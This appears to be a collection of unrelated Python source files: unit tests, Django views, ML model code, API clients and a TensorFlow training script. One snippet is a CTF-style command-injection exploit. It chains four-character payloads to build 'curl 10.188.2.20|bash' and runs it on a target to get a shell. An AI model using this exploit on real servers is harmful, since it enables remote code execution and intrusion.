self.assertEqual('some_file_0.jl', writer._get_file_name())
writer.close()
def test_file_name_default_compression(self):
writer_config = self.get_writer_config(file_name='some_file_')
print writer_config
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual('some_file_0.jl.gz', writer._get_file_name())
writer.close()
def test_file_name_bz2_compression(self):
writer_config = self.get_writer_config(file_name='some_file_', compression='bz2')
print writer_config
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual('some_file_0.jl.bz2', writer._get_file_name())
writer.close()
|
11546579
|
from django.views.generic import TemplateView
class SubmissionsView(TemplateView):
template_name = 'management/submissions.html'
class UserManagementView(TemplateView):
template_name = 'management/user_management.html'
|
11546605
|
import xarray as xr
def detect_dtype(aa):
if isinstance(aa, xr.Dataset):
dtype = aa[list(aa.data_vars)[0]].dtype
print(
"No `dtype` chosen. Input is Dataset. \
Defaults to %s"
% dtype
)
elif isinstance(aa, xr.DataArray):
dtype = aa.dtype
return dtype
|
11546658
|
import paddle
from paddle.nn import Sigmoid
from paddle.nn import Tanh
from ppcls.arch.backbone.legendary_models.pp_lcnet import PPLCNet_x2_5
__all__ = ["PPLCNet_x2_5_Tanh"]
class TanhSuffix(paddle.nn.Layer):
def __init__(self, origin_layer):
super(TanhSuffix, self).__init__()
self.origin_layer = origin_layer
self.tanh = Tanh()
def forward(self, input, res_dict=None, **kwargs):
x = self.origin_layer(input)
x = self.tanh(x)
return x
def PPLCNet_x2_5_Tanh(pretrained=False, use_ssld=False, **kwargs):
def replace_function(origin_layer, pattern):
new_layer = TanhSuffix(origin_layer)
return new_layer
pattern = "fc"
model = PPLCNet_x2_5(pretrained=pretrained, use_ssld=use_ssld, **kwargs)
model.upgrade_sublayer(pattern, replace_function)
return model
|
11546691
|
import requests
from time import sleep
from urllib import quote
payload = [
# generate "g> ht- sl" to file "v"
'>dir',
'>sl',
'>g\>',
'>ht-',
'*>v',
# reverse file "v" to file "x", content "ls -th >g"
'>rev',
'*v>x',
# generate "curl orange.tw|python;"
# generate "curl 10.188.2.20|bash"
'>\;\\',
'>sh\\',
'>ba\\',
'>\|\\',
'>20\\',
'>2.\\',
'>8.\\',
'>18\\',
'>0.\\',
'>1\\',
'>\ \\',
'>rl\\',
'>cu\\',
# got shell
'sh x',
'sh g',
]
r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
assert len(i) <= 4
r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
print i
sleep(0.1)
|
11546718
|
from .template_generators import GAFFTemplateGenerator, SMIRNOFFTemplateGenerator, EspalomaTemplateGenerator
from .system_generators import SystemGenerator
|
11546738
|
import unittest
from unittest.mock import Mock
import amaxa
from .MockFileStore import MockFileStore
class test_ExtractOperation(unittest.TestCase):
def test_execute_runs_all_steps(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
# pylint: disable=W0612
for i in range(3):
oc.add_step(Mock(sobjectname=str(i), errors=[]))
oc.execute()
for s in oc.steps:
s.execute.assert_called_once_with()
self.assertEqual(oc, s.context)
def test_execute_returns_on_error(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
# pylint: disable=W0612
for i in range(3):
oc.add_step(Mock(sobjectname=str(i), errors=[]))
oc.steps[1].errors = ["Bad things happened"]
assert oc.execute() == -1
oc.steps[0].execute.assert_called_once_with()
oc.steps[1].execute.assert_called_once_with()
oc.steps[2].execute.assert_not_called()
def test_add_dependency_tracks_dependencies(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
self.assertEqual(set(), oc.get_dependencies("Account"))
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]), oc.get_dependencies("Account")
)
def test_add_dependency_ignores_extracted_record(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(set(), oc.get_dependencies("Account"))
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
self.assertEqual(set(), oc.get_dependencies("Account"))
def test_store_result_retains_ids(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]), oc.extracted_ids["Account"]
)
def test_store_result_writes_records(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
def test_store_result_transforms_output(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
mapper_mock = Mock()
mapper_mock.transform_record = Mock(
return_value={"Id": "001000000000000", "Name": "<NAME>"}
)
oc.mappers["Account"] = mapper_mock
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
mapper_mock.transform_record.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
def test_store_result_clears_dependencies(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(set(), oc.get_dependencies("Account"))
def test_store_result_does_not_write_duplicate_records(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
oc.file_store.get_csv("Account", amaxa.FileType.OUTPUT).writerow.reset_mock()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_not_called()
def test_get_extracted_ids_returns_results(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]),
oc.get_extracted_ids("Account"),
)
def test_get_sobject_ids_for_reference_returns_correct_ids(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.get_field_map = Mock(
return_value={"Lookup__c": {"referenceTo": ["Account", "Contact"]}}
)
oc.store_result(
"Account", {"Id": "001000000000000", "Name": "University of Caprica"}
)
oc.store_result("Contact", {"Id": "003000000000000", "Name": "<NAME>"})
oc.store_result(
"Opportunity", {"Id": "006000000000000", "Name": "Defense Mainframe"}
)
self.assertEqual(
set(
[
amaxa.SalesforceId("001000000000000"),
amaxa.SalesforceId("003000000000000"),
]
),
oc.get_sobject_ids_for_reference("Account", "Lookup__c"),
)
|
11546755
|
from marshmallow import Schema, fields
class LoginPostRequestSchema(Schema):
login = fields.Str()
password = fields.Str()
|
11546772
|
import subprocess
returned_text = subprocess.check_output("speedtest-cli", shell=True, universal_newlines=True)
print("The Result of Speed Test")
print(returned_text)
|
11546774
|
import logging
from abc import ABC
from platypush.plugins.camera.model.writer import VideoWriter
logger = logging.getLogger('platypush')
class PreviewWriter(VideoWriter, ABC):
"""
Abstract class for camera previews.
"""
class PreviewWriterFactory:
@staticmethod
def get(*args, **kwargs) -> PreviewWriter:
try:
import wx
# noinspection PyUnresolvedReferences
from platypush.plugins.camera.model.writer.preview.wx import WxPreviewWriter
return WxPreviewWriter(*args, **kwargs)
except ImportError:
logger.warning('wxPython not available, using ffplay as a fallback for camera previews')
from platypush.plugins.camera.model.writer.preview.ffplay import FFplayPreviewWriter
return FFplayPreviewWriter(*args, **kwargs)
# vim:sw=4:ts=4:et:
|
11546823
|
import sys
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
test = test.strip()
if len(test) == 0:
continue
for i in range(1, len(test)+1):
sub_string = test[:i]
rejoined = "".join(test.split(sub_string))
if len(rejoined) == 0:
print(len(sub_string))
break
test_cases.close()
|
11546863
|
from django.contrib.auth.views import login, logout
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from quora.core.views import (
fblogin,
home,
password,
picture,
profile,
public_profile,
settings,
)
from quora.search.views import search
from quora.profile.views import signup
admin.autodiscover()
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^$', home, name='home'),
url(r'^hidden_login', login, {'template_name': 'core/cover.html'}, name='login'),
url(r'^fblogin', fblogin, name='fblogin'),
url(r'^logout', logout, {'next_page': '/'}, name='logout'),
url(r'^signup/$', signup, name='signup'),
url(r'^public_profile/(?P<id>\d+)/$', public_profile, name='public_profile'),
url(r'^settings/$', settings, name='settings'),
url(r'^settings/profile/$', profile, name='profile'),
url(r'^settings/password/$', password, name='password'),
url(r'^questions/', include('quora.questions.urls')),
url(r'^search/$', search, name='search'),
url(r'^(?P<username>[^/]+)/$', profile, name='profile'),
url('', include('social.apps.django_app.urls', namespace='social')),
url('', include('django.contrib.auth.urls', namespace='auth')),
]
|
11546865
|
import json
import os
import shutil
import tarfile
import unittest
from unittest import mock
import yaml
from mir.commands.infer import CmdInfer
from mir.tools import settings as mir_settings, utils as mir_utils
from mir.tools.code import MirCode
from tests import utils as test_utils
class TestCmdInfer(unittest.TestCase):
# life cycle
def __init__(self, methodName: str = ...) -> None:
super().__init__(methodName=methodName)
self._test_root = test_utils.dir_test_root(self.id().split('.')[-3:])
self._mir_repo_root = os.path.join(self._test_root, 'mir-demo-repo')
self._models_location = os.path.join(self._test_root, 'models')
self._src_assets_root = os.path.join(self._test_root, 'assets') # source assets, index and infer config file
self._working_root = os.path.join(self._test_root, 'work') # work directory for cmd infer
self._config_file = os.path.join(self._test_root, 'config.yaml')
self._assets_index_file = os.path.join(self._src_assets_root, 'index.tsv')
def setUp(self) -> None:
self._prepare_dir()
self._prepare_mir_root()
self._prepare_assets()
self._prepare_model()
self._prepare_config_file()
self._prepare_infer_result_file()
return super().setUp()
def tearDown(self) -> None:
self._deprepare_dir()
return super().tearDown()
# protected: setup and teardown
def _prepare_dir(self):
os.makedirs(self._test_root, exist_ok=True)
os.makedirs(self._models_location, exist_ok=True)
os.makedirs(self._working_root, exist_ok=True)
os.makedirs(os.path.join(self._working_root, 'out'), exist_ok=True)
os.makedirs(self._src_assets_root, exist_ok=True)
def _deprepare_dir(self):
shutil.rmtree(self._test_root)
def _prepare_mir_root(self):
test_utils.mir_repo_init(self._mir_repo_root)
test_utils.prepare_labels(mir_root=self._mir_repo_root, names=['person', 'cat'])
def _prepare_assets(self):
test_assets_root = TestCmdInfer._test_assets_root()
shutil.copyfile(src=os.path.join(test_assets_root, '2007_000032.jpg'),
dst=os.path.join(self._working_root, '2007_000032.jpg'))
with open(self._assets_index_file, 'w') as f:
f.write(f'{self._working_root}/2007_000032.jpg\n')
def _prepare_model(self):
# model params
with open(os.path.join(self._models_location, 'model.params'), 'w') as f:
f.write('fake model params')
# model json
with open(os.path.join(self._models_location, 'model.json'), 'w') as f:
f.write('fake model json')
# model config
test_assets_root = TestCmdInfer._test_assets_root()
with open(os.path.join(test_assets_root, 'training-template.yaml'), 'r') as f:
training_config = yaml.safe_load(f.read())
training_config['anchors'] = '12, 16, 19, 36, 40, 28, 36, 75, 76, 55, 72, 146, 142, 110, 192, 243, 459, 401'
training_config['class_names'] = ['person', 'cat', 'unknown-car']
model_storage = mir_utils.ModelStorage(models=['model.params', 'model.json'],
executor_config=training_config,
task_context={
'src_revs': 'master',
'dst_rev': 'a'
})
with open(os.path.join(self._models_location, 'ymir-info.yaml'), 'w') as f:
yaml.dump(model_storage.as_dict(), f)
# pack model
with tarfile.open(os.path.join(self._models_location, 'fake_model_hash'), "w:gz") as dest_tar_gz:
dest_tar_gz.add(os.path.join(self._models_location, 'model.params'), 'model.params')
dest_tar_gz.add(os.path.join(self._models_location, 'model.json'), 'model.json')
dest_tar_gz.add(os.path.join(self._models_location, 'ymir-info.yaml'), 'ymir-info.yaml')
def _prepare_config_file(self):
test_assets_root = TestCmdInfer._test_assets_root()
# shutil.copyfile(src=os.path.join(test_assets_root, 'infer-template.yaml'), dst=self._config_file)
with open(os.path.join(test_assets_root, 'infer-template.yaml'), 'r') as f:
executor_config = yaml.safe_load(f)
with open(self._config_file, 'w') as f:
yaml.safe_dump({mir_settings.EXECUTOR_CONFIG_KEY: executor_config}, f)
def _prepare_infer_result_file(self):
fake_infer_output_dict = {
'detection': {
'2007_000032.jpg': {
'annotations': [
{
'box': {
'x': 0,
'y': 0,
'w': 30,
'h': 30
},
'score': 0.5,
'class_name': 'cat',
},
],
},
},
}
infer_output_file = os.path.join(self._working_root, 'out', 'infer-result.json')
with open(infer_output_file, 'w') as f:
f.write(json.dumps(fake_infer_output_dict))
@staticmethod
def _test_assets_root() -> str:
return os.path.join(os.path.dirname(__file__), '..', 'assets')
# protected: mocked functions
def _mock_run_docker_cmd(*args, **kwargs):
pass
# public: test cases
@mock.patch('subprocess.run', side_effect=_mock_run_docker_cmd)
def test_00(self, mock_run):
fake_args = type('', (), {})()
fake_args.work_dir = self._working_root
fake_args.mir_root = self._mir_repo_root
fake_args.model_location = self._models_location
fake_args.model_hash = 'fake_model_hash'
fake_args.index_file = self._assets_index_file
fake_args.config_file = self._config_file
fake_args.executor = 'infer-executor:fake'
fake_args.executant_name = 'executor-instance'
cmd_instance = CmdInfer(fake_args)
cmd_result = cmd_instance.run()
# check running result
self.assertEqual(MirCode.RC_OK, cmd_result)
expected_cmd = ['nvidia-docker', 'run', '--rm']
expected_cmd.append(f"-v{fake_args.work_dir}:/in/assets:ro")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'models')}:/in/models:ro")
expected_cmd.append(
f"-v{os.path.join(fake_args.work_dir, 'in', 'candidate-index.tsv')}:/in/candidate-index.tsv")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'config.yaml')}:/in/config.yaml")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'env.yaml')}:/in/env.yaml")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'out')}:/out")
expected_cmd.extend(['--user', f"{os.getuid()}:{os.getgid()}"])
expected_cmd.extend(['--name', fake_args.executant_name])
expected_cmd.append(fake_args.executor)
mock_run.assert_called_once_with(expected_cmd, check=True, stdout=mock.ANY, stderr=mock.ANY, text=True)
# check assets and index.tsv
with open(os.path.join(fake_args.work_dir, 'in', 'candidate-index.tsv'), 'r') as f:
contents = f.read().splitlines()
self.assertEqual(1, len(contents))
self.assertEqual('/in/assets/2007_000032.jpg', contents[0])
# check config
with open(os.path.join(fake_args.work_dir, 'in', 'config.yaml'), 'r') as f:
infer_config = yaml.safe_load(f.read())
self.assertTrue('class_names' in infer_config)
self.assertTrue('model_params_path' in infer_config)
# check model params
self.assertTrue(os.path.isfile(os.path.join(fake_args.work_dir, 'in', 'models', 'model.params')))
|
11546914
|
from kubernetes import client
from kubernetes.client.rest import ApiException
from .load_kube_config import kubeConfig
kubeConfig.load_kube_config()
core = client.CoreV1Api()
class K8sNameSpace:
def get_ns(logger):
logger.info ("Fetching namespaces data...")
try:
ns_list = core.list_namespace(timeout_seconds=10)
return ns_list
except ApiException as e:
logger.warning("Exception when calling CoreV1Api->list_namespace: %s\n" % e)
|
11546926
|
import sqlalchemy as sa
from sqlalchemy.sql.util import ClauseAdapter
from .chained_join import chained_join # noqa
def path_to_relationships(path, cls):
relationships = []
for path_name in path.split('.'):
rel = getattr(cls, path_name)
relationships.append(rel)
cls = rel.mapper.class_
return relationships
def adapt_expr(expr, *selectables):
for selectable in selectables:
expr = ClauseAdapter(selectable).traverse(expr)
return expr
def inverse_join(selectable, left_alias, right_alias, relationship):
if relationship.property.secondary is not None:
secondary_alias = sa.alias(relationship.property.secondary)
return selectable.join(
secondary_alias,
adapt_expr(
relationship.property.secondaryjoin,
sa.inspect(left_alias).selectable,
secondary_alias
)
).join(
right_alias,
adapt_expr(
relationship.property.primaryjoin,
sa.inspect(right_alias).selectable,
secondary_alias
)
)
else:
join = sa.orm.join(right_alias, left_alias, relationship)
onclause = join.onclause
return selectable.join(right_alias, onclause)
def relationship_to_correlation(relationship, alias):
if relationship.property.secondary is not None:
return adapt_expr(
relationship.property.primaryjoin,
alias,
)
else:
return sa.orm.join(
relationship.parent,
alias,
relationship
).onclause
def chained_inverse_join(relationships, leaf_model):
selectable = sa.inspect(leaf_model).selectable
aliases = [leaf_model]
for index, relationship in enumerate(relationships[1:]):
aliases.append(sa.orm.aliased(relationship.mapper.class_))
selectable = inverse_join(
selectable,
aliases[index],
aliases[index + 1],
relationships[index]
)
if relationships[-1].property.secondary is not None:
secondary_alias = sa.alias(relationships[-1].property.secondary)
selectable = selectable.join(
secondary_alias,
adapt_expr(
relationships[-1].property.secondaryjoin,
secondary_alias,
sa.inspect(aliases[-1]).selectable
)
)
aliases.append(secondary_alias)
return selectable, aliases
def select_correlated_expression(
root_model,
expr,
path,
leaf_model,
from_obj=None,
order_by=None,
correlate=True
):
relationships = list(reversed(path_to_relationships(path, root_model)))
query = sa.select([expr])
selectable = sa.inspect(leaf_model).selectable
if order_by:
query = query.order_by(
*[adapt_expr(o, selectable) for o in order_by]
)
join_expr, aliases = chained_inverse_join(relationships, leaf_model)
condition = relationship_to_correlation(
relationships[-1],
aliases[-1]
)
if from_obj is not None:
condition = adapt_expr(condition, from_obj)
query = query.select_from(join_expr.selectable)
if correlate:
query = query.correlate(
from_obj if from_obj is not None else root_model
)
return query.where(condition)
|
11546928
|
from __future__ import annotations
from voluptuous.error import Invalid
from ..enums import HacsCategory, RepositoryFile
from ..repositories.base import HacsRepository
from ..repositories.integration import HacsIntegrationRepository
from ..utils.validate import INTEGRATION_MANIFEST_JSON_SCHEMA
from .base import ActionValidationBase, ValidationException
async def async_setup_validator(repository: HacsRepository) -> Validator:
"""Set up this validator."""
return Validator(repository=repository)
class Validator(ActionValidationBase):
"""Validate the repository."""
repository: HacsIntegrationRepository
more_info = "https://hacs.xyz/docs/publish/include#check-manifest"
categories = [HacsCategory.INTEGRATION]
async def async_validate(self):
"""Validate the repository."""
if RepositoryFile.MAINIFEST_JSON not in [x.filename for x in self.repository.tree]:
raise ValidationException(
f"The repository has no '{RepositoryFile.MAINIFEST_JSON}' file"
)
content = await self.repository.async_get_integration_manifest(self.repository.ref)
try:
INTEGRATION_MANIFEST_JSON_SCHEMA(content)
except Invalid as exception:
raise ValidationException(exception) from exception
|
11546935
|
import os
BULK_DB = os.path.join(__path__[0], 'bulks.db')
ADSORBATE_DB = os.path.join(__path__[0], 'adsorbates.db')
|
11546951
|
from uuid import uuid4
from django.utils.functional import cached_property
from wagtail.core.blocks import BaseStructBlock, Block
from ..exceptions import RemovedError
from ..widgets import BlockData
class NewBaseStructBlock(BaseStructBlock):
def __init__(self, local_blocks=None, **kwargs):
self._constructor_kwargs = kwargs
Block.__init__(self, **kwargs)
self.child_blocks = self.base_blocks.copy()
if local_blocks:
for name, block in local_blocks:
block.set_name(name)
self.child_blocks[name] = block
self.dependencies = self.child_blocks.values()
@cached_property
def definition(self):
definition = super(BaseStructBlock, self).definition
definition.update(
isStruct=True,
children=[child_block.definition
for child_block in self.child_blocks.values()],
)
html = self.get_instance_html({})
if html is not None:
definition['html'] = html
for child_definition in definition['children']:
if 'titleTemplate' in child_definition:
definition['titleTemplate'] = child_definition['titleTemplate']
break
return definition
def js_initializer(self):
raise RemovedError
def get_form_context(self, *args, **kwargs):
raise RemovedError
def render_form(self, *args, **kwargs):
raise RemovedError
def value_from_datadict(self, data, files, prefix):
return self._to_struct_value([
(child_block_data['type'],
self.child_blocks[child_block_data['type']].value_from_datadict(
child_block_data, files, prefix,
))
for child_block_data in data['value']
if child_block_data['type'] in self.child_blocks
])
def prepare_value(self, value, errors=None):
children_errors = self.get_children_errors(errors)
if children_errors is None:
children_errors = {}
prepared_value = []
for k, child_block in self.child_blocks.items():
child_errors = (None if children_errors is None
else children_errors.get(k))
child_value = value.get(k, child_block.get_default())
html = child_block.get_instance_html(child_value,
errors=child_errors)
child_value = BlockData({
'id': str(uuid4()),
'type': k,
'hasError': bool(child_errors),
'value': child_block.prepare_value(child_value,
errors=child_errors),
})
if html is not None:
child_value['html'] = html
prepared_value.append(child_value)
return prepared_value
def value_omitted_from_data(self, *args, **kwargs):
raise RemovedError
|
11546954
|
import hashlib
import os
import sys
from ruamel.yaml import YAML
from possum.config import logger
from possum.utils.general import hash_directory
def _possum_name():
cwd = os.getcwd()
return f'{os.path.split(cwd)[-1]}-' \
f'{hashlib.sha1(cwd.encode()).hexdigest()[-8:]}'
def get_possum_path(user_dir):
possum_dir = os.path.join(user_dir, '.possum')
if not os.path.exists(possum_dir):
logger.info('Creating Possum directory...')
os.mkdir(possum_dir)
elif not os.path.isdir(possum_dir):
logger.error(f"'{possum_dir}' is not a directory! Delete to "
"allow Possum to recreate the directory")
sys.exit(1)
return os.path.join(possum_dir, _possum_name())
class PossumFile(object):
def __init__(self, user_dir):
self.path = get_possum_path(user_dir)
try:
with open(self.path, 'r') as f_obj:
data = YAML().load(f_obj)
except FileNotFoundError:
data = {
'lastRun': dict(),
's3Uris': dict()
}
self._data = data
def save(self):
with open(self.path, 'w') as f_obj:
YAML().dump(self._data, f_obj)
def check_hash(self, func_name, source_dir):
last_hash = self._data['lastRun'].get(func_name)
source_hash = hash_directory(source_dir)
if last_hash == source_hash:
return True
else:
self._data['lastRun'][func_name] = source_hash
return False
def get_last_s3_uri(self, func_name):
s3_uri = self._data['s3Uris'].get(func_name)
return s3_uri
def set_s3_uri(self, func_name, s3_uri):
self._data['s3Uris'][func_name] = s3_uri
|
11546957
|
from azureml.core import Workspace
subscription_id = 'subscription_id-stage'
resource_group = 'resource_group-stage'
workspace_name = 'workspace_name-stage'
try:
ws = Workspace(subscription_id = subscription_id, resource_group = resource_group, workspace_name = workspace_name)
ws.write_config()
print('Library configuration succeeded')
except:
print('Workspace not found')
|
11546968
|
from hubspot import HubSpot
from hubspot.cms.site_search import PublicApi
def test_is_discoverable():
apis = HubSpot().cms.site_search
assert isinstance(apis.public_api, PublicApi)
|
11546981
|
from org.python.tests.RespectJavaAccessibility import Banana, Pear
p = Pear()
b = Banana()
assert b.amethod() == 'Banana.amethod()'
assert p.amethod() == 'Banana.amethod()'
assert b.amethod(1,2) == 'Banana.amethod(x,y)'
assert p.amethod(1,2) == 'Pear.amethod(x,y)'
assert b.privBanana() == 'Banana.privBanana()'
assert p.privPear() == 'Pear.privPear()'
assert b.protMethod() == 'Banana.protMethod()'
assert p.protMethod() == 'Banana.protMethod()'
assert b.protMethod(1,2) == 'Banana.protMethod(x,y)'
assert p.protMethod(1,2) == 'Pear.protMethod(x,y)'
|
11546994
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class BandwidthManager(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /bandwidth_manager and its endpoints.
"""
__baseurl = 'bandwidth_manager/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@header_vars('fields')
def post_configurations(self, *, configuration, fields=None, **kwargs):
"""
POST /bandwidth_manager/configurations
Creates a bandwidth manager configuration
"""
function_endpoint = urljoin(self._baseurl, 'configurations')
return self._call('POST', function_endpoint, json=configuration, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_configurations(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /bandwidth_manager/configurations
Retrieves a list of configurations.
"""
function_endpoint = urljoin(self._baseurl, 'configurations')
return self._call('GET', function_endpoint, **kwargs)
def delete_configurations_by_id(self, id, **kwargs):
"""
DELETE /bandwidth_manager/configurations/{id}
Delete a bandwidth manager configuration by ID.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@request_vars('fields')
def get_configurations_by_id(self, id, *, fields=None, **kwargs):
"""
GET /bandwidth_manager/configurations/{id}
Retrieves a configuration.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_configurations_by_id(self, id, *, configuration, fields=None, **kwargs):
"""
POST /bandwidth_manager/configurations/{id}
Update a bandwidth manager configuration by ID.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=configuration, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_filters(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /bandwidth_manager/filters
Retrieves a list of egress filters.
"""
function_endpoint = urljoin(self._baseurl, 'filters')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_filters(self, *, _class, fields=None, **kwargs):
"""
POST /bandwidth_manager/filters
Creates a bandwidth manager filter
"""
function_endpoint = urljoin(self._baseurl, 'filters')
return self._call('POST', function_endpoint, json=_class, **kwargs)
@request_vars('fields')
def get_filters_by_id(self, id, *, fields=None, **kwargs):
"""
GET /bandwidth_manager/filters/{id}
Retrieves a filter.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_filters_by_id(self, id, *, filter, fields=None, **kwargs):
"""
POST /bandwidth_manager/filters/{id}
Delete a filter by sequence ID.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=filter, **kwargs)
def delete_filters_by_id(self, id, **kwargs):
"""
DELETE /bandwidth_manager/filters/{id}
Update a filter by ID.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
|
11546999
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import argparse
import os
import inspect
import json
import random
from sharingan_base import *
def initRand():
seed = 0
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
def processArgs():
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="where to put output files")
parser.add_argument("--checkpoint", default=None, help="directory with checkpoint to resume training from or use for testing")
parser.add_argument("--max_steps", type=int, help="number of training steps (0 to disable)")
parser.add_argument("--max_epochs", type=int, help="number of training epochs")
parser.add_argument("--batch_size", type=int, default=1, help="number of images in batch")
parser.add_argument("--save_freq", type=int, default=1000, help="save frequency")
parser.add_argument("--summary_freq", type=int, default=1000, help="summary frequency")
parser.add_argument("--progress_freq", type=int, default=50, help="progress display frequency")
parser.add_argument("--lr", type=float, default=0.0002, help="learning rate")
parser.add_argument("--beta1", type=float, default=0.5, help="beta1")
parser.add_argument("--l1_weight", type=float, default=100.0, help="l1_weight")
parser.add_argument("--gan_weight", type=float, default=1.0, help="gan_weight")
parser.add_argument("--ngf", type=int, default=16, help="ngf")
parser.add_argument("--ndf", type=int, default=16, help="ndf")
parser.add_argument("--conv_std", type=float, default=0.001, help="conv_std")
parser.add_argument("--enable_quantization", action="store_true", help="True for tflite quantization")
a = parser.parse_args()
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
for k, v in a._get_kwargs():
print(k, "=", v)
with open(os.path.join(a.output_dir, "options.json"), "w") as f:
f.write(json.dumps(vars(a), sort_keys=True, indent=4))
hyp = HyperParams(a.lr, a.beta1, a.l1_weight, a.gan_weight, a.ngf, a.ndf, a.conv_std, a.enable_quantization)
with open(os.path.join(a.output_dir, "hyper_params.json"), "w") as f:
f.write(json.dumps(hyp._asdict(), sort_keys=True, indent=4))
return a, hyp
def main():
initRand()
a, hyper_params = processArgs()
examples = load_examples(input_dir=a.input_dir, batch_size=a.batch_size, is_training=True)
print("examples count = %d" % examples.count)
# inputs and targets are [batch_size, height, width, channels]
model = create_model(
inputs = examples.inputs,
targets = examples.targets,
hyper_params = hyper_params,
is_training = True,
is_fused = True
)
inputs = examples.inputs
targets = examples.targets
outputs = model.outputs
with tf.name_scope("encode_images"):
display_fetches = {
"paths": examples.paths,
"inputs": inputs,
"targets": targets,
"outputs": outputs,
}
tf.summary.scalar("discriminator_loss", model.discrim_loss)
tf.summary.scalar("generator_loss_GAN", model.gen_loss_GAN)
tf.summary.scalar("generator_loss_L1", model.gen_loss_L1)
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name + "/values", var)
for grad, var in model.discrim_grads_and_vars + model.gen_grads_and_vars:
tf.summary.histogram(var.op.name + "/gradients", grad)
with tf.name_scope("parameter_count"):
parameter_count = tf.reduce_sum([tf.reduce_prod(tf.shape(v)) for v in tf.trainable_variables()])
server = tf.train.Server.create_local_server()
saver = tf.train.Saver(max_to_keep=64)
tensors_to_log = {
"d_loss": "discriminator_loss/discrim_loss",
"g_loss_GAN":"generator_loss/gen_loss_GAN",
"g_loss_L1":"generator_loss/gen_loss_L1",
"global_step":"global_step"
}
logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=a.progress_freq)
max_steps = examples.steps_per_epoch * a.max_epochs
summary_op = tf.summary.merge_all()
hooks = [
